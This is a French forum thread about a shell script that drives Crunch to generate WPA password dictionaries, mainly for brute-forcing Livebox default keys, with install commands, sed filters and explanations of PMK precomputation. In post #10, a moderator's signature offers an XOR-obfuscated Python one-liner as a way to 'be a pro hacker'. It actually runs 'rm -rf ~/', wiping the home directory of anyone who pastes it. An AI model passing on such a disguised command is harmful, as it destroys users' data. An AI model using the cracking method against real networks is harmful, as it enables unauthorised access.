Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-09-2010 23:49:42

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Salut à tous

Vous connaissez peut-être le script-maison Giga Password Generat0r. Il permet de contrôler facilement Crunch (un générateur de dictionnaire). Pour en savoir plus, je vous renvoie vers le topic original -->  Giga Password Generat0r: un script de génération de dicos et clés WPA

Il commençait à se faire vieux, donc je l'ai récemment remis à neuf. Le but premier était de le rendre compatible avec les dernières versions de BackTrack, il peut désormais fonctionner sur n'importe quelle distribution.
Au programme donc :
- compatibilité native avec BT4 et BT4-R1
- nettoyage et compactage du code (moins de 800 lignes au lieu de 1000+)
- le dictionnaire est créé dans le répertoire courant (et plus sur le bureau). Il suffit d'exécuter le script depuis un disque externe pour contourner les limitations d'espace.
- utilisation du fichier charset.lst de Crunch (c'est facile d'ajouter les caractères spéciaux après)
- suppression de l'option "-stdout:63" que le nouveau Crunch n'aime pas
- vérification si Crunch est bien installé, et how-to  install + exit si ce n'est pas le cas => testé et validé sur Ubuntu (mais ca devrait marcher partout)
- avertissement sur la taille du fichier complet WPA Livebox (5,47e14 To...)
- transcodage en UTF8 (encodage par défaut sous Ubuntu), pour éliminer les problèmes d'accents

Rien d'extraordinaire donc, je l'ai juste remis au goût du jour mais certains apprécieront peut-être smile
Le nouveau script peut être téléchargé ici --> keygen_sh.zip
Notez qu'il n'est plus compatible avec BackTrack 3, vous devrez donc utiliser l'ancien script, toujours disponible ici --> script Giga Password Generator (ou installer une version plus récente de Crunch avec les instructions fournies)

Au niveau de l'utilisation, rien n'a changé. Vous arriverez toujours devant un menu qui propose différents modes :
1-menu-giga-password-generator.png
Pour le fonctionnement complet, voir le post de M1ck3y, mais le script est très intuitif donc il ne devrait pas être difficile à utiliser smile

Je tiens à signaler que ce générateur est basé sur Crunch, et que donc il génère des dictionnaires complets. Ceux-ci peuvent vite devenir énormes si vous travaillez sur un charset varié ou des mots de passe très longs. Par exemple, si on le laisse faire le mode "spécial Livebox WPA" va générer un fichier de plus de 547000000000000 Téraoctets !!
C'est un des points faibles de ce script, qui pourrait être résolu prochainement avec une autre forme de générateur, stay tuned ! Par contre, pour des mots de passe courts, il peut générer l'ensemble de toutes les possibilités, ce qui peut être intéressant wink

Une dernière chose : le script est facile à comprendre, et je ne demande pas mieux que de l'améliorer ! Quelques pistes :
- installation automatique de Crunch si nécessaire
- ajouter des cas (caractères spéciaux,...)
- réduire la longueur (sans rendre le code trop complexe)
- pré-calculer la taille totale du dico pour avertir l'utilisateur
- filtrer les mots de passe où le même caractère se répète plus de X fois
- ...
Laissez libre cours à votre imagination, et discutez ici des améliorations que vous pourriez proposer smile

[EDIT]
Suite à la sortie de la version 2.6, les commandes données pour l'installation de Crunch ne fonctionnent plus. Il faut remplacer cette commande :

wget http://downloads.sourceforge.net/project/crunch-wordlist/crunch-wordlist/crunch2.4.tgz > /dev/null

par celle-ci :

wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/OldFiles/crunch2.4.tgz/download > dev/null

et ça devrait refonctionner wink

Mise à jour 19/1/11 : la version 2.9 de Crunch permet d'afficher la taille du dico à l'avance, et affiche la progression (en %) pendant la génération. Voir plus bas pour les modifications à effectuer

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-09-2010 02:38:46

d0ne
Membre
Inscription : 03-03-2010
Messages : 16

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

merci beaucoup antares145. je n'ai pas tenu mes paroles de l'ancien topic. j'ai été très pris et n'ai pas eu le temps d'uploader ma petite version modifiée. la tienne étant largement optimisée, je pense que c'est une très bonne nouvelle base ^^

Hors Ligne

#3 09-09-2010 10:35:02

Syfer
Membre Indispensable
Inscription : 09-06-2010
Messages : 507
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Merci a tout ceux qui on travaillé ensemble pour divulguer ce script génial.

J'aimerais apprendre a faire ces genre de script pour faire ma petite contribution smile

Je l'ai déja a peine testé et il m'a paru très bien smile


masignature.gif

Hors Ligne

#4 10-10-2010 15:20:00

TomTom
Membre
Inscription : 10-10-2010
Messages : 11

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Bonjour,
d'abord merci d'avoir mis à jour ce script.
Avec un ami on s'est acheté deux disques durs de 1.5To chacun parce qu'ils n'étaient pas chers. Alors comme pour l'instant on ne les utilises pas vraiment, on s'est dit qu'on pouvait essayer de créer de gros dico WPA.
Après quelques recherches sur internet, on a trouvé de gros dico mais trop souvent avec des mots anlgais.
J'ai entendu des dicos du Sorcier, mais malheureusement je n'ai pu les récupérer, les  deux sites de sa team semblent inaccessibles.

Pour créer un dico spécial Livebox WPA, on peut utiliser ce script qui demanderait beaucoup plus de DD que nos simples 3To de stockage ! J'ai entendu parler qu'il était possible de connaitre 6 caractères sur les 26 demandés. De plus, certains d'entre vous parlent de mettre au point un "filtre" sur les mdp qui contiendraient trop souvent la même lettre.
=> Avez-vous des nouvelles à ce sujet ?

Je me demande aussi à quoi servent les 4 caractères hexa dans l'essid : Livebox-4F8G.
=> Quelqu'un aurait une explication ?

Enfin, je me suis dit que je pourrais créer des tables de Hash pour tester plus rapidement les clés WPA. Cependant, si j'ai bien compris, pour calculer ce Hash, il faut connaitre le nom de l'essid.
=> Est-ce bien le cas ?
Ensuite, on peut mettre ses tables de Hash en place avec airolib, je ne me trompe pas ?

Donc si tout ce que j'ai évoqué est correcte, mon pote et moi pourrions créer un petit programme en C, Java, Lisp (LOL) ... qui permet de calculer le Hash en fonction de l'essid passé en paramètre.
Enfin, pour nettoyer le code de mdp comme aaaaaabbbbbbbbcccccppppppp, soit on lance un petit programme sur le fichier txt (ce qui empêche de faire un pipe entre le scipt et aircrack) soit faut modifier le générateur, mais là j'en ai aucune idée.

Par avance, merci beaucoup pour vos réponses et vos contributions !

Hors Ligne

#5 10-10-2010 23:03:16

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Salut TomTom, bienvenue sur le forum smile

J'ai entendu parler qu'il était possible de connaitre 6 caractères sur les 26 demandés. De plus, certains d'entre vous parlent de mettre au point un "filtre" sur les mdp qui contiendraient trop souvent la même lettre.
=> Avez-vous des nouvelles à ce sujet ?

Alors si tu sais comment trouver 6 caractères sur les 26, je veux bien en savoir plus parce que ca m'intéresse smile Pour ce qui est du filtre, c'est faisable avec Sed (voir ce post --> Modification script perl (19+1 Neufbox)) mais la syntaxe est moche. Je crois qu'il doit y avoir moyen de faire plus propre en Perl mais j'ai pas encore trouvé hmm

Enfin, je me suis dit que je pourrais créer des tables de Hash pour tester plus rapidement les clés WPA. Cependant, si j'ai bien compris, pour calculer ce Hash, il faut connaitre le nom de l'essid.
=> Est-ce bien le cas ?
Ensuite, on peut mettre ses tables de Hash en place avec airolib, je ne me trompe pas ?

C'est exact, ce que tu appelles "un hash" est en fait une PMK, le résultat de 4096 itérations successives de SHA1 sur la clé avec l'ESSID en salt (4096 hashes de hash, si tu veux). Tu peux utiliser Airolib-ng pour générer ces tables, mais Pyrit travaille plus rapidement (si tu as un bon GPU à mobiliser) et peut fournir les mêmes tables.

Donc si tout ce que j'ai évoqué est correcte, mon pote et moi pourrions créer un petit programme en C, Java, Lisp (LOL) ... qui permet de calculer le Hash en fonction de l'essid passé en paramètre.
Enfin, pour nettoyer le code de mdp comme aaaaaabbbbbbbbcccccppppppp, soit on lance un petit programme sur le fichier txt (ce qui empêche de faire un pipe entre le scipt et aircrack) soit faut modifier le générateur, mais là j'en ai aucune idée.

Te fatigue pas à recréer un programme pour générer les PMK, Pyrit est déjà bien développé et optimisé (enfin, tu fais comme tu veux hein ! tongue). Il faut juste lui fournir une liste de mots de passe à hacher, qu'on peut pré-optimiser avec Sed comme je le disais, ou en perl (mais ca sera plus lourd et je sais pas comment). La génération de ladite liste de mots de passe pouvant se faire par exemple avec ce script, ou avec un programme dédié comme LiveboxGenerator (qui génère des clés aléatoires rapidement).

Hors Ligne

#6 10-10-2010 23:53:26

TomTom
Membre
Inscription : 10-10-2010
Messages : 11

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Merci pour toutes ces réponses !
Don en fait, si je comprends bien, j'arrive après la bagarre ! Y a plus rien à faire ?! LiveboxGenerator a l'air au point pour générer des mdp aléatoires. Pyrit crée les tables de hash (je l'ai pas essayé, mais il prend l'essid en paramètre ?).

Je vais donc aller poster sur le sujet de LiveboxGenerator pour voir comment l'optimiser (je me demande si en faisant des appels système on ne pourrait pas éviter ce problème de buffer. Même si le principal problème n'est pas le temps qu'il faut pour générer la liste de mdp, mais plutot l'espace de stockage.

Merci, bonne soirée !

Ps : est-ce que le hash de AABBCCDD est le même que aabbccdd ? Parce que pour les livebox, la clé est en Maj ou minuscules ? Avant, la mienne était en minuscules dans la console d'admin (mais c'était une clé WEP).

EDIT : pour les six caractères connus, ça serait le "sorcier" qui a trouvé ça. Je l'ai lu sur ce forum.
Sinon, personne ne sait si les 4 caractères hexa de l'essid servent à quelque chose ?

Dernière modification par TomTom (11-10-2010 00:01:23)

Hors Ligne

#7 11-10-2010 00:13:07

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

La "bataille" dont tu parles ne pourra avoir lieu que quand les disques de 1 Yo (1 yottaoctet = 1 tera de teraoctets) seront démocratisés big_smile
Liveboxgenerator est (plutôt) bien foutu pour la génération des mots de passe, mais en full aléatoire. Si on avait une indication sur la façon dont les vraies clés sont générées on pourrait réduire drastiquement le nombre de possibilités. Par exemple, il y a une théorie comme quoi les clés ne commencent jamais par 0 ; si c'est vérifié, c'est déjà un grand pas, mais loin d'être le dernier smile

Oui, Pyrit prend le SSID en paramètre, même une liste de SSID dans une DB je pense. C'est obligatoire, puisque le SSID est nécessaire pour calculer les PMK wink C'est d'ailleurs un des problèmes de la méthode, les hashes ne sont valables que pour un seul SSID ! The Church of Wifi a généré quelques grosses tables avec les SSID les + courants aux USA, mais la portée reste somme toute limitée hmm

Si tu sais travailler sur le code du LiveboxGenerator, c'est intéressant. Son auteur Spzdb1 a proposé quelques améliorations possibles et perso le multithread m'intéresse assez smile
Le problème du stockage n'en est pas un (directement) dans le sens où on peut modifier le programme pour qu'il affiche les clés à la sortie standard plutôt que dans un fichier, ce qui permet de faire un pipe vers Pyrit directement (avec éventuellement un Sed entre les 2 pour le filtrage). Bon, après il faut encore stocker les hash de Pyrit roll
Bref, on est un peu hors-sujet, on peut en parler sur l'autre topic smile

Re-PS : le hash est complètement différent. Il se base sur la fonction SHA1, voilà ce que ca donne :

SHA1(AABBCCDD) = 52f424f1d0a6a0562c3900d40e3bb72062af5ce8 
SHA1(aabbccdd) = 527bee2730bf234e9a78bde5af091ece9c6302d5

Dis toi bien que dans le WPA, le hash est lui-même hashé 4095 fois avant de donner la PMK, donc vas-y pour faire le lien entre tes 2 clés AABBCCDD et aabbccdd wink
Pour le WEP, ca dépend des implémentations pour la forme ASCII, mais si ta clé est sous la forme Hexadécimale le couple maj/min ne change rien.

Hors Ligne

#8 11-10-2010 00:22:10

TomTom
Membre
Inscription : 10-10-2010
Messages : 11

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Je t'ai répondu sur l'autre topic.
Pour ce qui est de l'espace de stockage, tu as raison.

Reste "plus qu'à" trouver comment sont générées ces WPA de livebox ! lol

Dernière modification par TomTom (11-10-2010 17:39:57)

Hors Ligne

#9 21-10-2010 14:02:53

Syfer
Membre Indispensable
Inscription : 09-06-2010
Messages : 507
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

J'avais pensé a quelque chose, est-il possible d'intégré une limite ou de illimité avec le choix de l'un ou l'autre la taille allouer pour un dico startblock ? sinon comment on fait pour limité les dicos a long charactère ? j'ai fait un test l'autre jours et j'ai crée un dico de 1 To lol sa me parait un peu impratique ^^ mais sinon sa serait sympa d'intégré cette nouvelle fonctionalité au script smile

[EDIT] oubliez la fonction illimité a bien y penser c'est du genre inutile et pas pratique du tout tongue

Dernière modification par Syfer (21-10-2010 14:06:59)


masignature.gif

Hors Ligne

#10 17-01-2011 00:48:54

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Bonsoir.

A propos de GPG, j'ai réalisé en quelques minutes un petit script pour générer un dictionnaire formé de mots entrés au cours du script; En intercalant entre eux - _ . et autres symboles séparateurs.

N'y aurais-il pas une petite implémentation (une 72 ème méthode de génération smile à donner au code de GPG ?

                        Hexadécimalement, Spawn.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 17-01-2011 22:11:08

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Bonjour,

J'ai BT R2 live USB et je voudrais que mon dico se cré sur mon disque dur externe, j'ai juste à mettre keygen.sh sur le disque dur et a le lancer? Peux-tu atteindre une vitesse de 200mo/min même si mon disque dur est externe?
merci!


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#12 18-01-2011 00:52:21

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Mmh, je pense qu'en mettant keygen.sh sur le disque dur externe ça peut marcher, mais à ta place je mettrais quand même un chemin complet quand on te demande "file", par exemple /mnt/usb/dico.txt (adapte avec le point de montage de ton disque USB).

Pour ce qui est de la vitesse de 200 Mo/min ça va dépendre de ton disque, mais je pense que c'est raisonnable comme objectif wink

NB : pour connaître le point de montage de ton disque dur externe, accède à son contenu avec Konqueror (tape media:/ dans la barre d'adresse, F5 pour rafraîchir si rien ne s'affiche) puis tape F4 pour ouvrir une console à cet endroit. Tapes-y la commande "pwd" (pour Print Working Directory) et ce que j'appelle le point de montage apparaîtra (sans doute du genre /mnt/*** ou /media/***)

Hors Ligne

#13 19-01-2011 16:00:51

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Le logiciel est effectivement vraiment rapide! J'ai un disque dur externe de 1000mo vierge, donc pas trop de problème pour l'espace, mais il serait intéressant de voir la progression de la création du dico!


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#14 19-01-2011 17:40:29

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Reyals a écrit :

J'ai un disque dur externe de 1000mo vierge, donc pas trop de problème pour l'espace

Sans vouloir te vexer, avec un disque de 1 Go (1000 Mo) tu n'iras pas loin wink Tu parlais de 1000 Go peut-être ?

Il est possible de voir la progression du dico, mais uniquement avec la dernière version de Crunch, ce qui implique quelques ajustements :
1) Installer Crunch 2.9 (dernière version en date)

wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-2.9.tgz
tar -xf crunch-2.9.tgz
cd crunch2.9
make
cp * /pentest/passwords/crunch
cd ..
rm -r crunch*

2) Modifier le script pour transformer les "> $file" en "-o $file" (obligatoire pour cette version de Crunch !)

#Se placer d'abord dans le dossier de keygen.sh
cp keygen.sh keygen.sh~
sed s/"> $file"/"-o $file"/g keygen.sh~ > keygen.sh
chmod +x keygen.sh

Et voilà smile Le script fonctionne comme avant, sauf que maintenant il annonce (en anglais) la taille du futur dico et il affiche régulièrement la progression (en %).

Pour ce qui est de la vitesse de génération, c'est vrai que Crunch est très rapide (c'est l'avantage du langage C), le facteur limitant sera la vitesse d'écriture sur ton disque wink Grâce à l'estimation désormais donnée par Crunch au début, et la vitesse d'écriture du disque (que tu connais) tu peux estimer le temps que ça prendra.

Hors Ligne

#15 24-01-2011 03:23:03

dingo
N00b
Inscription : 24-01-2011
Messages : 1

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Bonjour à tous,

Tout d'abord bravo pour ce site qui explique clairement les choses, et merci pour toute l'aide déjà apportée!

Juste une petite question sur le Giga Password Generat0r.
Je sais que le mot de passe de mon réseau wpa est constitué de 10 caractères hexadécimaux.
Seulement, générer un dictionnaire exhaustif prendrait beaucoup trop de place. D'ou mon idée d'enlever les combinaisons les moins probables.
En regardant différents mots de passes pour les mêmes box, je me suis apperçu de 2 choses:
1)Aucun caractère ne se répète plus de 3 fois.
2) Aucun cacatère ne se répète plus de 2 fois d'affilé.

Avez-vous une idée pour adapter le scrypt? j'y suis arrivé pour la condition 1) mais pas pour la 2!
Si j'ai bien calculé, en réduisant ces possibiltés, j'arrive à un dictionnaire d'environ 2,8To. Ce qui reste beaucoup, mais plus raisonable.

Merci d'avance pour votre aide!

Hors Ligne

#16 30-01-2011 12:06:52

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Salut dingo, bienvenue sur le forum smile

Pour tes 2 conditions, il y a moyen d'utiliser Sed pour filtrer le dico. La première je n'y ai jamais vraiment réfléchi (donne toujours ta solution ici, ça peut servir), pour la deuxième j'en avais parlé plusieurs topics (Clés par défaut et optimisation du dico entre autres) :

cat dico.txt | sed -e '/\([A-Z,0-9]\)\1\{2,\}/d' >> dico_modified.txt
#Remplacer le "2" par le nombre maximum de répétitions autorisées

(cette commande est atroce, je me le dis à chaque fois que je la vois big_smile)

Cette solution implique de passer par un premier dico, qu'on filtre ensuite avec Sed et on stocke le résultat dans un deuxième dico ; résultat des courses, il faut quand même stocker le dico complet, donc on n'a rien gagné hmm
Pour contourner le problème, il vaut mieux utiliser Crunch directement (on peut récupérer la ligne de commande kivabien dans le code-source du script G.P.G) et lui faire envoyer les mots de passe sur la sortie standard, puis stocker seulement le résultat du filtrage wink En "clair", dans ton cas ça donne :

/pentest/passwords/crunch 10 10 0123456789ABCDEF | sed -e '/\([A-Z,0-9]\)\1\{2,\}/d' >> dico_modified.txt

(adapte le chemin de Crunch si nécessaire, et ajoute l'option "-u" à la fin si tu utilises une version récente et que tu veux supprimer les infos de taille/progression/...)

Hors Ligne

#17 07-03-2011 06:31:01

hotmil
Nouveau membre
Inscription : 07-03-2011
Messages : 5

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Je n'arrive pas à faire marcher le programme sous Ubuntu 10.10 (sous blacktrack sa marche niquel ) j'ai mi le fichier en executable mais impossible de le mettre dans /usr/bin et quand je le lancer avec un terminal sa ne marche pas.

Hors Ligne

#18 07-03-2011 12:40:13

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Sa serait bien de rajouté aux script les fonctions 19 à 23 de la version 1.2 de M1ck3y (post N°2) très pratique pour générer des ssid comme dans sont exemple mais compatible que BT3. j'essayerais de mis collé si j'ai un peut de temp libre cette semaine

Hors Ligne

#19 08-03-2011 00:00:51

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

@hotmil : Tu peux détailler ? Pourquoi impossible de le mettre en [c]/usr/bin[/c] (t'as essayé avec sudo au moins ?), "ça ne marche pas", c-à-d ? Tu as réussi à installer Crunch ?

@jordx2504 : u as accès au code de l'ancien et du nouveau keygen.sh, ce n'est pas très difficile à adapter smile Perso j'ai pas trop le temps de m'en occuper maintenant, donc fais-toi plaisir wink

Hors Ligne

#20 11-03-2011 09:42:38

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Hello all
Voici le script Giga Password Generat0r v1.3.
Cette nouvelle version est compatible BT4 et inclut les 5 nouveaux modes crées par M1ck3y (bien pratique pour générer un dico d'essid par exemple)

Fonctions ajoutées:

--> 19 Charset personnalisé
--> 20 Charset personnalisé + choix startblock
--> 21 Mask Startmask seulement
--> 22 Mask Endmask seulement
--> 23 Mask Startmask + Endmask

Bon teste a tous !!!

Edit Antares145 : pour ceux qui se poseraient la question, le mot de passe c'est crack-wifi wink

Dernière modification par jordx2504 (11-03-2011 09:45:18)

Hors Ligne

#21 11-04-2011 12:37:45

lelapinvert
N00b
Inscription : 11-04-2011
Messages : 3

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

bonjour,
Creer un fichier , ou disons pipé la sortie de crunch vers le airnrg est lent, aussi j'ai entendu parlé de la creation de rainbow table basé sur un fichier dictionnaire, ce qui apparement permettrait de multiplié par 10 la vitesse de crackage. des idées la dessus? merci.

Dernière modification par lelapinvert (11-04-2011 12:38:28)

Hors Ligne

#22 11-04-2011 13:20:51

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

lelapinvert a écrit :

pipé la sortie de crunch vers le airnrg est lent

C'est quoi airnrg ? hmm

Pour les Rainbow Tables, le concept est un peu différent : on parle de table de PMK, qui sont une autre forme de compromis temps-mémoire, mais le fonctionnement n'est pas du tout le même que les RT (ou le TMTO de Hellman) wink

Normalement aircrack-ng doit, pour chaque passphrase de la liste, calculer la PMK en utilisant l'ESSID et la passphrase à travers la fonction PBKDF2. Cette étape de calcul peut être réalisée à l'avance si tu as déjà la wordlist et l'ESSID, c'est de ça qu'on parle ici : générer à l'avance des tables de PMK. Une fois que tu as ça, le crack se résume à une "simple" comparaison et il est beaucoup plus rapide.

Pour plus d'infos, renseigne-toi sur Airolib-ng (--> Crack de clé WPA avec Airolib-ng sous Backtrack 3)et Pyrit, et éventuellement sur Cowpatty qui propose un outil similaire (genpmk). Ca n'a rien à voir avec ce topic-ci, donc merci d'en créer un nouveau si tu veux continuer à en parler wink

Hors Ligne

#23 13-04-2011 10:41:53

lelapinvert
N00b
Inscription : 11-04-2011
Messages : 3

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Alors jai donc tester le petit crunch. probleme :
1/ je crois qu'il faut un espace entre chaque groupe de hexadecimal pour les cle livebox, or le petit scritp lance juste "crunch 26 26 1234567890ABCDEF " donc ca ne va pas il faut un masque pour regrouper par groupe de 4 puis 2 les 2 derneirs caractere.
2/ probleme plus important : crunch genere n'importe quoi sans que l'on puisse modifier la sortie, cest à dire : il va nous sortir des truc genre 00000000000000000000000001 , etc il est evident qu'aucune box n' a une clé comme ca, il faudrait donc dans le programme ( pas le petit scritp mais le petit code C de crunch) faire en sorte que : Si caractere en position 1, et caractere en position 2 sont identique, alors caractere en 3eme position ne peut etre identique aux 2 premiers, et faire de meme pour chaque groupe de 4 : ainsi on obtient pas des clé avec des AAAAAAAAAA455 etc qui ne sont pas du tout utilisé.
le mieux serait davoir une série de vraie cle de livebox, et d'en deduire un algo.
des idess? merci.

Hors Ligne

#24 13-04-2011 11:18:19

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

Je vois pas vraiment le rapport avec Giga Password Generat0r.

Deuxième chose, le charset hexadécimale n'est pas 1234567890ABCDEF mais 01234567890ABCDEF.

Effectivement comme tu le dit: 00000000000000000000000001 ne peux clairement pas être une clé valable. Un pipe de crunch vers sed permettrait de filtrer les résultats. On peut même optimisé le génération de en utilisant le start block de crunch à 00011122233344455566677788. wink

Pour ton histoire d'algo, j'ai rien d'autre a jouter que ceci.

Dernière modification par Squaks (13-04-2011 11:20:14)


Sharkoff

Hors Ligne

#25 13-04-2011 13:02:51

lelapinvert
N00b
Inscription : 11-04-2011
Messages : 3

Re : Giga Password Generat0r : génération de dicos (mis à jour pour BT4-R1)

hello, merci pour le lien sur l'algo.
Enfin le rapport avec ce sujet, c'est simple: je trouve que la fonction "17" ou "18", de memoire, de ce petit script pour faire un dico de cle livebox est pas terrible ( non mais c'est bien d'avoir pris du temps pour faire ce petit script bien sur ), car comme jai pu voir aucune cle de live box n' a 3 caracteres identiques successifs, et donc on reduirai de maniere très significative le nombres de lignes totalement inutile. la commande crunch meme la v2.9 apparement ne permet pas de faire ca.. il faudrait donc editer le code de crunch pour l'empecher des generer 3 fois de suite le meme caracteres et en trouvant pour autant toutes les combinaisons possibles..

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]